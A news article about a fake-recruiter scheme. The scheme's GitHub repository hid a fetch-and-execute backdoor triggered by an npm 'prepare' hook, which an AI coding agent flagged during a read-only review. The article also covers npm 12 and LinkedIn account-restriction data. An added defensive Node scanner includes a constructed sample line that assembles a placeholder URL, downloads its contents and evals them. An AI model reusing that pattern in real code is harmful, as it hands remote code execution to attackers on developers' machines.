"Don't run this code, just walk away because there's a trap," Roman Imankulov said his local AI agent told him when it analyzed a cloned repository.
How the bait was laid: fake recruiter, cloned repo, and a hidden backdoor
A person posing as a recruiter for a small crypto startup contacted Python developer Roman Imankulov on LinkedIn asking him to troubleshoot proof-of-concept code and consider a lead-engineer role. Imankulov said something about the exchange felt off; he cloned the repository to a Hetzner VPS and began an inspection. The repository contained a file, app/test/index.js, that embedded a backdoor: a server URL assembled from fragmented strings and a network request that would execute whatever the server returned.
The repo's package.json also included a "prepare" post-installation hook that would run the malicious script during an npm install. The repo itself has been removed — "presumably GitHub removed it in response to Imankulov's complaint" — though a clone can still be found, according to the reporting. When Imankulov contacted the apparent author of the commits, that developer told him he had been impersonated on GitHub before and did not write the code.
AI plus caution: a read-only analysis that spotted what a human missed
Rather than running the code locally, Imankulov ran a Pi coding agent powered by Codex to conduct a read-only analysis. He expected a safe-but-sloppy verdict; instead the agent flagged the file and advised him not to run the code. Imankulov said the agent "caught details that I had missed" — he had skimmed the file and assumed it was merely poorly written, while the agent identified the outbound request and assembled URL that constituted the backdoor.
The episode is not unique: the story cites other developers who nearly fell for similar social-engineering campaigns and were prevented from executing malicious code by AI agents. Devashri Datta, an independent open source and security architect, framed the pattern this way: attackers were "hijack[ing] standard developer workflows" by relying on routine commands such as npm install to trigger payloads, and obfuscating domains by fragmenting strings to defeat static analysis tools.
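The two hallmarks described above (a "prepare" hook in package.json that fires on a plain npm install, and a source file that assembles a URL from string fragments, fetches it, and executes the response) can be checked for without running anything from the clone. The following Node script is an added illustration, not code from the article, from Imankulov, or from the agent he used; the package.json and source text it scans are constructed stand-ins that mimic the pattern, and the domain in them is a placeholder.

```javascript
// Added example: read-only triage of a cloned repository for the two warning
// signs the article describes. Nothing here executes the scanned code.

// Lifecycle hooks npm runs around installation. "prepare" runs on a bare
// `npm install` in the project root, which is what makes it useful as bait.
const LIFECYCLE_HOOKS = new Set(["preinstall", "install", "postinstall", "prepare"]);

// Three regexes that, together, approximate "build a URL from pieces,
// request it, execute whatever comes back". Each on its own is only a hint.
const FRAGMENTED_STRING = /(["'][^"']{1,12}["']\s*\+\s*){2,}["'][^"']*["']/; // "ht" + "tps://" + ...
const NETWORK_REQUEST = /\b(https?\.(get|request)|fetch|axios\.(get|post)|XMLHttpRequest)\b/;
const DYNAMIC_EXEC = /\b(eval|new Function|vm\.runInThisContext|child_process\.exec)\b/;

// Return the install-time hooks declared in a package.json document.
function lifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  return Object.keys(scripts)
    .filter((name) => LIFECYCLE_HOOKS.has(name))
    .map((name) => ({ hook: name, command: scripts[name] }));
}

// Line-by-line pattern scan of a JavaScript source file.
function scanSource(sourceText) {
  const findings = [];
  sourceText.split("\n").forEach((line, index) => {
    const lineNo = index + 1;
    if (FRAGMENTED_STRING.test(line)) findings.push({ line: lineNo, kind: "fragmented-string" });
    if (NETWORK_REQUEST.test(line)) findings.push({ line: lineNo, kind: "network-request" });
    if (DYNAMIC_EXEC.test(line)) findings.push({ line: lineNo, kind: "dynamic-exec" });
  });
  return findings;
}

// Combine the signals into a verdict. A request whose response is executed,
// reachable from an install hook, is the combination the article describes.
function triage(packageJsonText, sourceText) {
  const hooks = lifecycleScripts(packageJsonText);
  const findings = scanSource(sourceText);
  const kinds = new Set(findings.map((f) => f.kind));
  const remoteExec = kinds.has("network-request") && kinds.has("dynamic-exec");
  let verdict;
  if (remoteExec && hooks.length > 0) verdict = "do-not-install";
  else if (remoteExec || kinds.has("fragmented-string")) verdict = "review";
  else if (hooks.length > 0) verdict = "inspect-hooks";
  else verdict = "no-findings";
  return { verdict, hooks, findings };
}

// Constructed sample input (hypothetical; the domain is a placeholder).
const SAMPLE_PACKAGE_JSON =
  '{"name":"poc","scripts":{"prepare":"node app/test/index.js","test":"jest"}}';
const SAMPLE_SOURCE = [
  'const u = "ht" + "tps://" + "example.invalid" + "/p";',
  'https.get(u, (res) => { let b = ""; res.on("data", (c) => (b += c)); res.on("end", () => eval(b)); });',
].join("\n");

console.log(JSON.stringify(triage(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCE), null, 2));
```

On the constructed sample the verdict is "do-not-install": one "prepare" hook plus a fragmented string on line 1 and a request-then-eval pair on line 2. The heuristics are deliberately coarse; the point is that they run over text and never import or execute the file, and that the same check belongs in a throwaway VPS or container, not on a workstation holding SSH keys. Until npm 12 ships, `npm install --ignore-scripts` gives the same opt-out that the new default will provide.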
npm 12: a platform-level change to curb install-time execution
GitHub — which maintains npm — is preparing npm 12, and the release will change npm install's default behavior. According to GitHub, the allowScripts setting will be defaulted to off so that "npm install will no longer execute preinstall, install, or postinstall scripts from dependencies unless they are explicitly allowed in your project." GitHub product manager Leo Balter wrote that "install-time lifecycle scripts are the single largest code-execution surface in the npm ecosystem" and that making script execution opt-in "closes that path while keeping it one command away for the packages you trust."
Imankulov said he has little strong opinion about the change; for personal safety he switched to pnpm to avoid executing install scripts by default. Datta noted that the incident underlines why supply-chain security must reach developer endpoints: machines used during a job interview often store SSH keys, cloud tokens, and live repository access, making a compromised workstation an attractive first step for attackers.
What this means for developers, enterprises, and platforms
- Developers and security teams: The episode illustrates the value of constrained, read-only analysis and isolated execution environments. Datta recommended enforcing guardrails such as isolated developer containers or secure cloud workstations for evaluating third-party or untrusted code, while Imankulov's use of a VPS and an AI agent provided a quick, noninteractive triage.
- Enterprises and procurement leaders: Supply-chain security must "shift left" to the developer workstation. Datta argued that VEX-style signals and exploitability context need to travel further left than SBOM inventories to intercept threats at the point of introduction; a compromised local endpoint can expose keys and live access before code enters corporate pipelines.
- Platforms and social networks: LinkedIn's account-restriction data underscores the scale of the problem. The site restricted 386,000 accounts after user reports in January through June 2025, up from 266,000 in the prior six-month period and 86,000 in January through June 2021. The article connects that volume of fake or impersonated profiles to the social-engineering vectors used to lure developers into running code.
Conclusions: an incremental fix, and more to be done
Imankulov escaped what could have been a straightforward compromise by combining guarded operational choices with an AI inspection that spotted an obfuscated backdoor in seconds. GitHub's forthcoming npm 12 — with allowScripts defaulted off — addresses the installation-time execution vector at scale, but the incident illustrates that platform-level hardening, developer hygiene, and endpoint isolation all play roles. Datta's closing point is direct: attackers are moving their operations left, into individual engineering endpoints, and defenses must follow.